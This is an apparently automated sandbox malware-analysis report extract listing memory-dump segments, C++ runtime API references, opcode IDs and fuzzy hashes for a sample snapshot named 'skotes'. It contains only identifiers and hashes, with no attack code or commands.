                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                          • String ID:
                                                          • API String ID: 1091748018-0
                                                          • Opcode ID: d53e7dea43852cff18fb0635744a153ff7bb7dc555e2f48da9f7d4a4f726ad28
                                                          • Instruction ID: de0a025d5247d928ce354bee22c0098e833a82d14154382410131bec85115938
                                                          • Opcode Fuzzy Hash: d53e7dea43852cff18fb0635744a153ff7bb7dc555e2f48da9f7d4a4f726ad28
                                                          • Instruction Fuzzy Hash: 4D41F070604214ABDF19EBA4C896BBEBB79EF45310F148199E5079B3C2CB70AE45C791
                                                          APIs
                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00C056F2
                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00C05726
                                                          • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00C0578B
                                                          • SafeRWList.LIBCONCRT ref: 00C0579A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                          • String ID:
                                                          • API String ID: 893951542-0
                                                          • Opcode ID: 862f8064ef28450efe5f2c098f886f01113b57a9358be630b396cb4690a8d6ca
                                                          • Instruction ID: f6e3153d2f3eeb369bdc72b4697558bf0bb667240c35a10cee63cf8b735f4b64
                                                          • Opcode Fuzzy Hash: 862f8064ef28450efe5f2c098f886f01113b57a9358be630b396cb4690a8d6ca
                                                          • Instruction Fuzzy Hash: 17312436B10614DFCF09AF24C885BAE73A6AF89710F184278E9059F395DF30AE05CB90
                                                          APIs
                                                          • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00C02D0F
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                          • String ID:
                                                          • API String ID: 3433162309-0
                                                          • Opcode ID: 98c5aaadfc6d7524ad8ac1f04eeb3e3c42ff4804712686d62467d360a996a391
                                                          • Instruction ID: feb195ae7fbe140f27ecbfaab4260fb86f1e85fc6d86a7befafd45ca04cdff84
                                                          • Opcode Fuzzy Hash: 98c5aaadfc6d7524ad8ac1f04eeb3e3c42ff4804712686d62467d360a996a391
                                                          • Instruction Fuzzy Hash: 70313775A00309DFCF14EF94C8D4BAEBBB9BB44314F1404AADD15AB286D730AE45DBA0
                                                          APIs
                                                          • __EH_prolog3_catch.LIBCMT ref: 00C113FC
                                                          • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00C11447
                                                          • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00C1147A
                                                          • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00C1152A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                          • String ID:
                                                          • API String ID: 2092016602-0
                                                          • Opcode ID: 2b16a98e6c1ce71475be0382ecd8a49a969d04508f94cd463266a53e5e6894d2
                                                          • Instruction ID: 4d3932ee23cdb64ded2565894d0f08c23eac623e55f4859d38d321ded32b7cfe
                                                          • Opcode Fuzzy Hash: 2b16a98e6c1ce71475be0382ecd8a49a969d04508f94cd463266a53e5e6894d2
                                                          • Instruction Fuzzy Hash: 8C318371E006059FCF04EFA9C4915EDF7F5BF49710B18822DE926A7391DB34AA41DB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                          • String ID:
                                                          • API String ID: 531285432-0
                                                          • Opcode ID: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
                                                          • Instruction ID: c8064f495d2dfb4ebe862086979898f466a28cb1d16ca585a62f81bb9fd174b9
                                                          • Opcode Fuzzy Hash: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
                                                          • Instruction Fuzzy Hash: DB212F75A0011DAFDF00EFA8DD81EBEBBB9EF08714F500495FA01A7251DB319D499BA0
                                                          APIs
                                                          • __EH_prolog3_catch.LIBCMT ref: 00C09C9C
                                                          • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00C09CE8
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 00C09CFE
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 00C09D6A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
